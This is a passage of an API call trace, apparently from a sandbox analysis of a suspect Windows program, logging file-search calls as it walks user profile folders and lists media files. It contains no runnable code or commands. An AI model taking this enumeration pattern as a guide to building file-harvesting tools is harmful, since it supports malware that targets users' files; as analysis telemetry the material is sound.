dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-r24cctxl", cAlternateFileName="S-R24C~1")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1ac38c0, ftCreationTime.dwHighDateTime=0x1d5dcfb, ftLastAccessTime.dwLowDateTime=0x4b19c0c0, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0x4b19c0c0, ftLastWriteTime.dwHighDateTime=0x1d5dce8, nFileSizeHigh=0x0, nFileSizeLow=0x4352, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T1R4MLRFaG-Q.png", cAlternateFileName="T1R4ML~1.PNG")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9e6a260, ftCreationTime.dwHighDateTime=0x1d5df82, ftLastAccessTime.dwLowDateTime=0x59132c20, ftLastAccessTime.dwHighDateTime=0x1d5e382, ftLastWriteTime.dwLowDateTime=0x59132c20, ftLastWriteTime.dwHighDateTime=0x1d5e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WVIC0My", cAlternateFileName="")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 1 [0209.939] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0 [0209.939] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.939] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.940] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0209.940] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.940] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.940] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.940] PathFindFileNameW (pszPath="") returned="" [0209.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0xffffffff [0209.940] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.940] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0209.940] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.940] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.940] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.940] PathFindFileNameW (pszPath="") returned="" [0209.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 0xffffffff [0209.941] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.941] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0209.941] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.941] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.941] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.941] PathFindFileNameW (pszPath="") returned="" [0209.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.941] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.941] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.941] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0209.941] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.941] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0209.942] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.942] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.942] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.942] PathFindFileNameW (pszPath="") returned="" [0209.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.942] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.942] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.942] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0209.942] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0209.942] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0209.942] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.942] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0209.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.943] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.943] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.943] PathFindFileNameW (pszPath="") returned="" [0209.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0209.943] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0209.943] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.943] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.943] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.943] PathFindFileNameW (pszPath="") returned="" [0209.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0209.944] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.944] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0209.944] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.944] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.944] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.944] PathFindFileNameW (pszPath="") returned="" [0209.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0209.944] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.944] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0209.944] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.944] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.944] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.944] PathFindFileNameW (pszPath="") returned="" [0209.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9bcf700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9bcf700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.945] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9bcf700, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9bcf700, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c062190, ftCreationTime.dwHighDateTime=0x1d5e4c7, ftLastAccessTime.dwLowDateTime=0xd87f8030, ftLastAccessTime.dwHighDateTime=0x1d5e4d1, ftLastWriteTime.dwLowDateTime=0xd87f8030, ftLastWriteTime.dwHighDateTime=0x1d5e4d1, nFileSizeHigh=0x0, nFileSizeLow=0xbfb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-xuO.avi", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf27d00a0, ftCreationTime.dwHighDateTime=0x1d5da8d, ftLastAccessTime.dwLowDateTime=0x8957d160, ftLastAccessTime.dwHighDateTime=0x1d5e517, ftLastWriteTime.dwLowDateTime=0x8957d160, ftLastWriteTime.dwHighDateTime=0x1d5e517, nFileSizeHigh=0x0, nFileSizeLow=0x1796d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0DLodo3wtKgJ355.avi", cAlternateFileName="0DLODO~1.AVI")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe8c40, ftCreationTime.dwHighDateTime=0x1d5de46, ftLastAccessTime.dwLowDateTime=0x80db2600, ftLastAccessTime.dwHighDateTime=0x1d5e057, ftLastWriteTime.dwLowDateTime=0x80db2600, ftLastWriteTime.dwHighDateTime=0x1d5e057, nFileSizeHigh=0x0, nFileSizeLow=0xa3c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1CDpY0.swf", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13706900, ftCreationTime.dwHighDateTime=0x1d5e5ab, ftLastAccessTime.dwLowDateTime=0x2f8058d0, ftLastAccessTime.dwHighDateTime=0x1d5de53, ftLastWriteTime.dwLowDateTime=0x2f8058d0, ftLastWriteTime.dwHighDateTime=0x1d5de53, nFileSizeHigh=0x0, nFileSizeLow=0xa495, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5Eo44I2cqs.swf", cAlternateFileName="5EO44I~1.SWF")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e154d0, ftCreationTime.dwHighDateTime=0x1d5d9b3, ftLastAccessTime.dwLowDateTime=0x18580aa0, ftLastAccessTime.dwHighDateTime=0x1d5dab0, ftLastWriteTime.dwLowDateTime=0x18580aa0, ftLastWriteTime.dwHighDateTime=0x1d5dab0, nFileSizeHigh=0x0, nFileSizeLow=0xc5b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60CV9tu.mp4", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2b80710, ftCreationTime.dwHighDateTime=0x1d5e622, ftLastAccessTime.dwLowDateTime=0xab43f30, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xab43f30, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0xd3af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7ViEfW bQcX6a_Wdjr.flv", cAlternateFileName="7VIEFW~1.FLV")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c281200, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xc5a0d0f0, ftLastAccessTime.dwHighDateTime=0x1d5de6d, ftLastWriteTime.dwLowDateTime=0xc5a0d0f0, ftLastWriteTime.dwHighDateTime=0x1d5de6d, nFileSizeHigh=0x0, nFileSizeLow=0x7a0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9OvK4rr7kHk_S_.swf", cAlternateFileName="9OVK4R~1.SWF")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb112640, ftCreationTime.dwHighDateTime=0x1d5e618, ftLastAccessTime.dwLowDateTime=0x6a7b2410, ftLastAccessTime.dwHighDateTime=0x1d5dfd9, ftLastWriteTime.dwLowDateTime=0x6a7b2410, ftLastWriteTime.dwHighDateTime=0x1d5dfd9, nFileSizeHigh=0x0, nFileSizeLow=0x12b45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AHFvMZk2Q_LNJvf.swf", cAlternateFileName="AHFVMZ~1.SWF")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3309d7b0, ftCreationTime.dwHighDateTime=0x1d5e056, ftLastAccessTime.dwLowDateTime=0xff8f26d0, ftLastAccessTime.dwHighDateTime=0x1d5de96, ftLastWriteTime.dwLowDateTime=0xff8f26d0, ftLastWriteTime.dwHighDateTime=0x1d5de96, nFileSizeHigh=0x0, nFileSizeLow=0x81e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aOKAjfXUh6dwJIzj_.mp4", cAlternateFileName="AOKAJF~1.MP4")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffc715f0, ftCreationTime.dwHighDateTime=0x1d5e6c9, ftLastAccessTime.dwLowDateTime=0x14b936a0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0x14b936a0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0xb8e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aTYRVsT4Wq FMYn5BKDv.avi", cAlternateFileName="ATYRVS~1.AVI")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f57bb0, ftCreationTime.dwHighDateTime=0x1d5dcca, ftLastAccessTime.dwLowDateTime=0xb0c0ce10, ftLastAccessTime.dwHighDateTime=0x1d5e42b, ftLastWriteTime.dwLowDateTime=0xb0c0ce10, ftLastWriteTime.dwHighDateTime=0x1d5e42b, nFileSizeHigh=0x0, nFileSizeLow=0x187d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B1-w-MfFYfDz.avi", cAlternateFileName="B1-W-M~1.AVI")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf24930, ftCreationTime.dwHighDateTime=0x1d5df8e, ftLastAccessTime.dwLowDateTime=0x1b335ef0, ftLastAccessTime.dwHighDateTime=0x1d5e7c6, ftLastWriteTime.dwLowDateTime=0x1b335ef0, ftLastWriteTime.dwHighDateTime=0x1d5e7c6, nFileSizeHigh=0x0, nFileSizeLow=0x81df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BGVUfXjkkn.mp4", cAlternateFileName="BGVUFX~1.MP4")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54adc370, ftCreationTime.dwHighDateTime=0x1d5e143, ftLastAccessTime.dwLowDateTime=0xef839810, ftLastAccessTime.dwHighDateTime=0x1d5d91f, ftLastWriteTime.dwLowDateTime=0xef839810, ftLastWriteTime.dwHighDateTime=0x1d5d91f, nFileSizeHigh=0x0, nFileSizeLow=0xa97c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CF_TgXEmdwBMS.flv", cAlternateFileName="CF_TGX~1.FLV")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32366d0, ftCreationTime.dwHighDateTime=0x1d5ddcf, ftLastAccessTime.dwLowDateTime=0xd2935ed0, ftLastAccessTime.dwHighDateTime=0x1d5d87e, ftLastWriteTime.dwLowDateTime=0xd2935ed0, ftLastWriteTime.dwHighDateTime=0x1d5d87e, nFileSizeHigh=0x0, 